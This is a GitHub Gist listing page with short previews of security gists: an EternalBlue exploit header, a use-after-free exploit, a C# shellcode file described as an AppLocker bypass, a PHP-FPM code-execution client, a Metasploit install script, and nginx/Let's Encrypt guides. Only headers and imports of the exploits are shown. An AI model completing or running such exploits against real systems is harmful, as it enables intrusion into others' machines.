soxfmr

@2XXE-SRA
2XXE-SRA / netrelease.ps1
Last active May 27, 2021
Add user to LanmanServer SrvsvcSessionInfo DACL, allowing them to perform NetSessionEnum (e.g. NetSess, BloodHound)
View netrelease.ps1
# based on NetCease: https://gallery.technet.microsoft.com/Net-Cease-Blocking-Net-1e8dcb5b
# can be deployed on a per-host basis using this script - e.g. via something like SCCM
# or, once deployed to one host, can be deployed via GPO Registry preferences by copying the set registry value
# (lanmanserver still needs to be restarted when done this way)
# see: https://adsecurity.org/?p=3299 -> Disable Windows Legacy & Typically Unused Features -> Disable Net Session Enumeration (NetCease)
# constants
$key = "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity"
$name = "SrvsvcSessionInfo"
View userafterfree_exploit.py
from socket import *
import struct
controller = None
puppet = None
class ChatClient:
    def __init__(self, server):
        self._server = server
        self._sock = socket(AF_INET, SOCK_STREAM, 0)
@icecr4ck
icecr4ck / idapython_cheatsheet.md
Last active Jan 27, 2022
Cheatsheet for IDAPython
View idapython_cheatsheet.md
@netbiosX
netbiosX / Shellcode.cs
Created Jun 6, 2017
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@minkione
minkione / msf_install.sh
Created May 22, 2017
Install metasploit on Debian 8
View msf_install.sh
# Install Oracle Java 8
apt-get install software-properties-common
add-apt-repository "deb http://ppa.launchpad.net/webupd8team/java/ubuntu xenial main" && apt-get update
apt-get install oracle-java8-installer
# Installing Dependencies
apt-get update
apt-get upgrade
apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev
@worawit
worawit / eternalblue7_exploit.py
Last active Sep 6, 2021
Eternalblue exploit for Windows 7/2008
View eternalblue7_exploit.py
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@phith0n
phith0n / fpm.py
Last active Jan 13, 2022
Fastcgi PHP-FPM Client && Code Execution
View fpm.py
import socket
import random
import argparse
import sys
from io import BytesIO
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client
PY2 = True if sys.version_info.major == 2 else False
@nrollr
nrollr / nginx.conf
Last active Jan 17, 2022
NGINX config for SSL with Let's Encrypt certs
View nginx.conf
# UPDATED 17 February 2019
# Redirect all HTTP traffic to HTTPS
server {
    listen 80;
    listen [::]:80;
    server_name www.domain.com domain.com;
    return 301 https://$host$request_uri;
}
# SSL configuration
View alictf-decrypt.py
import base64
from Crypto.Cipher import AES
from Crypto import Random
# pad = lambda s: s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
# unpad = lambda s : s[:-ord(s[len(s)-1:])]
KEY = "58897d583d888978b62469889d584472"
PW = "XIANJIAN "
@cecilemuller
cecilemuller / letsencrypt_2020.md
Last active Jan 22, 2022
How to setup Let's Encrypt for Nginx on Ubuntu 18.04 (including IPv6, HTTP/2 and A+ SSL rating)
View letsencrypt_2020.md

How to setup Let's Encrypt for Nginx on Ubuntu 18.04 (including IPv6, HTTP/2 and A+ SSL rating)


Virtual hosts

Let's say you want to host domains first.com and second.com.

Create folders for their files: